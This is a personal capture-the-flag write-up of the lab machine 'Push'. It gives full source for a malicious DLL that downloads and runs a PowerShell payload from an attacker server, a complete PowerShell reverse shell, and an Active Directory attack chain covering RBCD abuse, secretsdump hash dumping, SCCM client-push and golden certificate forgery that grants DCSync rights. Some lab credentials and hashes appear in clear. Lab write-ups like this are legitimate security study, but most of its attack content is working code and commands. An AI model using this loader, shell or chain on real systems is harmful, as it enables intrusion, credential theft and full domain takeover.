vulnlab-push
a hard windows machine
preperation
create puck.c on kali box
puck.c contains:
#include <windows.h> BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ switch(dwReason){ case DLL_PROCESS_ATTACH: system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))"); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; }
create malicious dll
puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll puck@kali:~$ file puck.dll puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
puckshell.txt contains:
function cleanup { if ($client.Connected -eq $true) {$client.Close()} if ($process.ExitCode -ne $null) {$process.Close()} exit} // Setup IPADDR $address = '192.168.1.136' // Setup PORT $port = '443' $client = New-Object system.net.sockets.tcpclient $client.connect($address,$port) $stream = $client.GetStream() $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize $process = New-Object System.Diagnostics.Process $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $process.StartInfo.RedirectStandardInput = 1 $process.StartInfo.RedirectStandardOutput = 1 $process.StartInfo.UseShellExecute = 0 $process.Start() $inputstream = $process.StandardInput $outputstream = $process.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; $testing = 0; while (-not $done) { if ($client.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($networkbuffer,0,$pos) $inputstream.write($string) start-sleep 1 if ($process.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($outputstream.Read()) while($outputstream.Peek() -ne -1){ $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}
on attacker pc run http listener and nc listener
c:\PENTEST>python3 -m http.server 9000 Serving HTTP on :: port 9000 (http://[::]:9000/) ... ::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 - ::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443 listening on [any] 443 ... connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868 Microsoft Windows [Version 10.0.22631.3880] (c) Microsoft Corporation. Alle rechten voorbehouden. C:\Windows\System32>whoami fakedomain\hillie
test on windows target with
rundll32.exe C:\Payloads\puck.dll,XYZ
If all tests are succesfull, we continue to the writeup.
Writeup :
To abuse clickonce we follow article , we need to upload our SelfService.dll.deploy , which will download and execute a reverse shell.
More to come …\
With shell as kelly.hill we find her credentials in her homefolder
evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' xfreerdp /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx
Bloodhound Analysis:
bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp
Check Machine Quota
crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq
RBCD abuse
From bloodhound we see kelly.hill First Degree Object Control , has AllExtendedRights
and WriteAccountRestrictions
on MS01, which means that we can read all properties on MS01 and we can edit msDS-AllowedToActOnBehalfOfOtherIdentity
to perform RBCD (Resource based constrained delegation) by having write account restrictions rights
┌──(puck㉿kali)-[~/vulnlab/push] └─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Successfully added machine account puckie$ with password Summer2024!. ┌──(puck㉿kali)-[~/vulnlab/push] └─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Accounts allowed to act on behalf of other identity: [*] Delegation rights modified successfully! [*] puckie$ can now impersonate users on MS01$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] puckie$ (S-1-5-21-1451457175-172047642-1427519037-3603) ┌──(puck㉿kali)-[~/vulnlab/push] └─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache ┌──(puck㉿kali)-[~/vulnlab/push] └─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache ┌──(puck㉿kali)-[~/vulnlab/push] └─$ impacket-secretsdump -k ms01.push.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d::: [*] Dumping cached domain logon information (domain/username:hash) PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31) PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04) PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)
Now that we have the Administrator hash of ms01
┌──(puck㉿kali)-[~/vulnlab/push] └─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\kelly.hill\documents> dir Directory: C:\Users\kelly.hill\documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/25/2024 7:39 AM 1125376 SharpSCCM.exe *Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info _______ _ _ _______ ______ _____ _______ _______ _______ _______ |______ |_____| |_____| |_____/ |_____] |______ | | | | | ______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem [+] Connecting to \\127.0.0.1\root\CCM [+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority ----------------------------------- SMS_Authority ----------------------------------- CurrentManagementPoint: DC01.push.vl Name: SMS:HQ0 ----------------------------------- [+] Completed execution in 00:00:00.2090991 *Evil-WinRM* PS C:\Users\kelly.hill\documents>
.
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter] └─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps SCCMHunter v1.0.5 by @garrfoster [10:15:22] INFO [*] Checking for System Management Container. [10:15:22] INFO [+] Found System Management Container. Parsing DACL. [10:15:22] INFO [-] System Management Container not found. [10:15:22] INFO [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM' [10:15:23] INFO [-] No results found. ┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter] └─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps SCCMHunter v1.0.5 by @garrfoster [10:17:30] INFO [-] No SiteServers found in database. [10:17:30] INFO [-] No Management Points found in database. [10:17:30] INFO [-] No computers found in database.
I could not solve sccadmin exploit .
It should run like below , and giving the hash in responder
PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0 .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0 _______ _ _ _______ ______ _____ _______ _______ _______ _______ |______ |_____| |_____| |_____/ |_____] |______ | | | | | ______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem [+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages [+] Reusable Base64-encoded certificate: 308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0 [+] Discovering local properties for client registration request [+] Modifying client registration request properties: FQDN: 10.8.2.138 NetBIOS name: 10.8.2.138 Site code: HQ0 [+] Sending HTTP registration request to DC01.push.vl:80 [+] Received unique SMS client GUID for new device: GUID:7D070746-617E-4763-9835-F7811A6BED54 [+] Discovering local properties for DDR inventory report [+] Modifying DDR and inventory report properties [+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0 [+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0 [+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233 [+] Completed execution in 00:00:06.9340974
.
As we now have the pass of user sccadmin , we do a Golden Ticket attack
┌──(puck㉿kali)-[~/vulnlab/push] └─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM" SMB DC01.push.vl 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False) SMB DC01.push.vl 445 DC01 [+] push.vl\sccadmin:7u<redacted>JM
golden Cerificate attack with certipy-ad & passthecert possible because we have system access to ms01 ( which is the CA )
┌──(puck㉿kali)-[~/vulnlab/push] └─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Creating new service [*] Creating backup [*] Retrieving backup [*] Got certificate and private key [*] Saved certificate and private key to 'CA.pfx' [*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push] └─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push] └─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Writing certificate and to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push] └─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push] └─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push] └─$ impacket-secretsdump kelly.hill@DC01.push.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password: [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09::: push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::
That was fun 🙂
.
references used
– sccm
.